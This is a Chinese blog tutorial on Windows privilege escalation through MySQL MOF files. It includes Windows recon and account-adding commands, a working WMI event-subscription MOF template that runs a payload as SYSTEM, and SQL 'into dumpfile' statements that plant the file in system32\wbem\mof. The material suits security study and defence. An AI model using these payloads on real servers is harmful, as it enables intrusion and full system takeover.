Windows提权之第三方组件mysql提权(mof)

已于 2022-04-04 20:59:34 修改
阅读量3.7k 收藏 2
点赞数
分类专栏: 提权篇 文章标签: 面试 web安全 安全 windows
于 2022-03-31 23:01:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mrx56/article/details/123885339
版权

为什么要提权?

答:因为webshell的权限一般是继承中间件的权限,此时就需要提高到系统管理员权限才方便进一步渗透。一般java中间件运行权限最高。

Windows提权常用命令

内置组:
Administrators(管理员组)
Guests (来宾组,权限最低,默认禁止)
Users(新建用户组)

net user 查看所有用户信息
net user + 用户名 查看此用户信息
net user + 用户名 /del 删除此用户
net user + 用户名+密码 /add 添加用户
net localgroup 查看组
net localgroup + 组名 查看组成员
net localgroup + 组名 +用户名 /add 将该用户增加到指定组里
whoami  /all  查看当前用户详细信息
hostname 主机名
systeminfo 系统信息
net start 查看开启的服务
query user 获取在线用户
netstat -ano 获取网络连接
dir c:\progamdata   分析安装了哪些杀软,因为一般杀软会把一些信息放在这个目录
tasklist /svc | find +服务名 查看进程中服务的pid
netstat -ano | find "pid"  定位端口
wmic qfe get Caption,Description,HotFixID,InstalledOn #列出已安装的补丁

1.什么是MOF?

MOF 文件是 mysql 数据库的扩展(C:\WINDOWS\system32\wbem\mof)叫做”托管对象格式”,其作用是每隔60s就会去监控进程创建和死亡,因为 MOF 文件每60s就会执行,且是系统权限,所以如果我们有权限替换原有的MOF文件,就能获得 system 权限。

2. MOF提权条件

Windows <= 2003
mysql 数据库的账号,且账号有写入权限mysql
在C:\WINDOWS\system32\wbem\mof目录有写入权限

3.一般方法

3.1有webshell

新建一个 test.mof 文件,内容如下

#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"payload\")";\\将想要执行的payload写在这即可
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};

将该文件利用webshell上传到目标主机中,然后执行以下命令

这里只能用 into dumpfile,不能用 into outfile,因为 into outfile函数会在行末端写入新行,更致命的是会转义换行符,这样的话这个二进制可执行文件就会被破坏
select load_file('C:\\phpStudy\\PHPTutorial\\WWW\\DVWA\\user.mof') into dumpfile 'C:\\WINDOWS\\system32\\wbem\\mof\\user.mof';

3.2无webshell但能链接数据库

将创建的test.mof文件十六进制编码(ascii)后用sql语句写入

select 十六进制代码(ascii代码) into dumpfile 'C:\\WINDOWS\\system32\\wbem\\mof\\test.mof';

简单总结

  1. 可以利用 msf 的exploit/windows/mysql/mysql_mof模块进行自动化提权
  2. 成功执行的文件会在C:\WINDOWS\system32\wbem\mof\good目录中,
    失败在C:\WINDOWS\system32\wbem\mof\bad目录中
  3. 查看mysql配置文件(Windows下为my.ini, Linux下的my.cnf)secure_file_priv的值可以知道mysql是否具有写入权限
show global variables like 'secure%';
     当 secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法提权
     当 secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下,此时也无法提权,tmp也可以改成其他
     当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制,此时可提权

在mysql5.5之前 secure_file_priv默认是空,这个情况下可以向任意绝对路径写文件
在mysql5.5之后 secure_file_priv默认是NULL,这个情况下不可以写文件

参考文献

good

mrx56
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql mof原理_[原创]WEB安全第六章篇12 mof
weixin_30631569的博客
02-26 261
WEB安全第六章篇12 mof1、mof是什么托管对象格式 (MOF) 文件是创建和注册供程序、事件类别和事件的简便方法。在 MOF 文件中创建类实例和类定义后,可以对该文件进行编译。编译 MOF 文件将在 CIM 储存库中注册所有的类定义和实例。之后,供程序、事件类别和事件信息便可由 便可由 WMI 和 Visual Studio Analyzer 使用。 在 MOF 文件中创建供...
[WEB安全]MySQl mof、udf过程详解
网络安全知识分享
12-17 3169
MySQL〇、Mysql的必备条件1、Mysql密码查询2、利用ntfs特性创建文件夹3、常用的sql基础查询命令一、mof0、环境搭建1、原理2、条件3、开始4、删号二、UDF0、原理1、步骤2、实操 〇、Mysql的必备条件 Mysql的服务没有降,并且需要获取Mysql root账号密码 使用net user命令查看系统当前帐号,如果出现Mysql这类用户,则系统可能进行了降 1、Mysql密码查询 1、root密码查询 # MySQL <= 5.6 版本 selec
数据库之Mysql
最新发布
白帽黑客鹏哥的博客
05-29 1003
UDF(user defined function)⽤户⾃定义函数,是 mysql 的⼀个拓展接⼝。⽤户可以通过⾃定义函数实现在mysql中⽆法⽅便实现的功能,其添加的新函数都可以在 sql 语句中调⽤,就像调⽤本机函数⼀样。 先前条件关于mysql的密码,可以通过假设的网站的配置文件获取,如login.php、config.inc.php等文件获取在默认情况下,mysql只允许本地登录,我们知道可以通过navicat去连接数据库(在知道帐号密码的情况下),但是如果只允许本地登录的情况下,即使知道账号密码的
mof
qq115399231的博客
07-16 533
原理 利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。 对windwos版本有所要求: 仅限windows server2008以下的版本 mof代码 #pragma namespace("\\\\.\\root\\subscription") insta...
内网渗透之——mysql数据库之——MOF
wsnbbz的博客
03-11 965
前题 只能在windows使用,应用范围:2008以下的系统,Mysql5.7以下(--secure_file_prive:此配置写文件不限制) 介绍 mofwindows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡 条件 mysql服务器配置允许root用户远程连接 ...
后渗透—— 数据库之MOF
爱国小白帽
03-12 1358
原理: mofwindows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root限了以后,然后使用root限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户...
Windows学习笔记
m0_62466350的博客
07-28 523
service_permissions模块会使用,两种方式获取system限,如果以管理员限运行,会尝试创建并运行一个新的服务,如果当前限不允许创建服务,会判断哪些服务的文件或文件夹的限有问题,并对其进行劫持,在劫持服务时会创建一个可执行程序,其文件名和安装路径都是随机的。如果网站里面使用的数据库是sqlserver 那么如果找到sa的密码,利用脚本,执行命令,但是不一定是系统限,还要看管理员开始安装sqlserver的限设置,一般情况是system限或者pulic,均能执行命令。
mof文件nullevt.mof
03-12
mofwindows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root限了以后,然后使用root限去执行我们上传的...
Mysql UDF、MOF、反链端口.zip
12-14
Mysql UDF、MOF、反链端口
w3dt.mof Windows2003 IIS安装缺失文件
10-23
Windows2003 IIS安装缺失文件
第60天:升-MY&MS&ORA等SQL数据库1
08-03
在网络安全和渗透测试中,升是一个关键环节,尤其是在无法利用...了解这些知识点并能灵活运用,攻击者就能在特定条件下获得更高的限,而防守方则需要采取严格的访问控制和安全策略,防止这种行为的发生。
基于MOF的企业架构模型仓库
03-02
本文内容包括:解决方案概述上下文环境解决方案架构基于MOF的EA模型语言(EAML)模型转换结论引用注释参考资料来自RationalEdge:本文介绍了Unisys公司所完成的为美国联邦政府大规模组织构建核心企业架构(EA)的...
UDFMOF
Armandhe的博客
06-05 1059
让我们来康康mysql的两种常见姿势!!!!!!!!!!!!!!!!
一文了解:溢出和第三方组件
闵行小鱼塘
05-04 2088
做个归纳,一般分为两种——溢出和第三方组件
mysql数据库反弹端口连接
热门推荐
xiaotu0821的博客
11-12 6万+
Mysql数据库反弹端口连接 在渗透或者安全评估时,有可能遇到一些比较奇葩的环境,即使通过Mysql root账号和密码获取了webshell,由于无法执行命令,在一般的情况下,也就放弃了,但其实可以换一种思路,通过mysql查询来直接,可以针对以下场景: (1)通过网站无法获取webshell (2)Webshell无法执行命令 (3)有phpmyadmin和root账号,无法查询或者无...
数据库mysql_MOF
qq_45300786的博客
05-24 173
mysql——mof 脚本 https://blog.csdn.net/weixin_36462845/article/details/113592918 mysql——mof 脚本2 https://www.cnblogs.com/xishaonian/p/6384535.html mysql——mof 16进制 https://blog.csdn.net/cxrpty/article/details/104805108?utm_medium=distribute.pc_relevant.no
第三方组件-SQL server
Love&Share
11-20 2570
文章目录基础MSSQL限级别拿webshellxp_cmdshell执行系统命令LOG备份getshell使用xp_cmdshell进行以下内容为转载使用sp_oacreate进行|无回显sp_oacreate简介sp_oacreate使用沙盒SQL Server 沙盒简介JOB使用xp_regwrite | 映像劫持其他骚操作使用sp_makewebtask写文件总结二级内网MSSQL渗透|上线CS 基础 MSSQL(MicroSoft SQL Server数据库),是微软.
第三方组件-zend nc、Zend反弹shell
Love&Share
11-21 1219
文章目录Zend NCZend反弹shell工具 在 PHP 里边有一个扩展 zend,这个是解析 PHP zend 脚本加密文件 关于Zend扩展的详细介绍:https://learnku.com/docs/php-internals/php7/zend-extension/7228 如果 服务器安装了 zend ZendExtensionManager.dll 限可以修改、写入 那就可以用其他 dll 文件替换原来的文件来进行操作 靶机:http://www.demoasp.com.
利用第三方软件
cxrpty的博客
03-12 1219
实验环境:windows2008 实验步骤: 一、搭建环境 1.关闭防火墙,在wwwroot写入yjh.aspx,密码为-7 2.用菜刀连接 二、实验操作 1.查看当前系统上所运行的软件:tasklist,可看是否运行了Filezilla server 2.用菜刀上传端口转发工具lcx.exe到temp文件夹 2.进行端口转发:lcx.exe -tran 14141127...
windows
08-27
Windows是指获取管理员限或系统级限的过程。在某些情况下,普通用户需要限以执行某些操作或访问受限资源。 有几种常见的Windows方法,包括: 1. 利用已知漏洞:Windows系统中可能存在一些未修补的漏洞,黑客可以利用这些漏洞来获取系统限。 2. 利用可信任的二进制文件:有些系统工具或第三方软件可能使用管理员限运行,黑客可以利用这些工具或软件中的漏洞来。 3. 利用服务:Windows系统中运行着多个服务,其中一些可能存在安全问题。黑客可以通过攻击这些服务来。 4. 利用注册表设置:有些注册表设置可以导致Windows系统在启动时以管理员限运行恶意代码。 需要注意的是,行为属于非法活动,违反了计算机安全法律法规。在使用任何方法之前,请确保你拥有合法的授,并遵守法律和道德准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值